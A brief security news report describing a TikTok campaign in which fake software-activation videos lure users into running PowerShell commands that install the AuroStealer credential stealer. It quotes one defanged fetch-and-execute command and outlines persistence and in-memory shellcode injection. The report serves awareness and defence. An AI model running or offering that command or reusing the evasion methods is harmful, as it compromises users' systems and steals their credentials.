IGMPI: TikTok Malware Campaign Tricks Users with Fake Software Activations
Centre for Sustainable Cybersecurity Technology

Cybercriminals are targeting TikTok users with a malware campaign disguised as free software activation offers. Videos promise access to popular applications such as Photoshop and lure viewers into executing malicious PowerShell commands. The attack begins when a victim runs a command such as `iex (irm slmgr[.]win/photoshop)`, which downloads malicious code from a remote server and runs it. The first-stage payload, which has a low detection rate on VirusTotal, fetches a secondary executable, `updater.exe`, identified as AuroStealer, malware designed to steal credentials and system information. To maintain persistence, the malware creates scheduled tasks with names that mimic legitimate Windows processes, such as "MicrosoftEdgeUpdateTaskMachineCore". A third-stage payload, `source.exe`, compiles C# code at runtime and injects shellcode directly into memory using Windows APIs, evading traditional detection methods. Variants of this campaign have been observed targeting users seeking cracked software. Security experts warn against downloading software from untrusted sources and urge caution when following instructions from online videos.

21-10-2025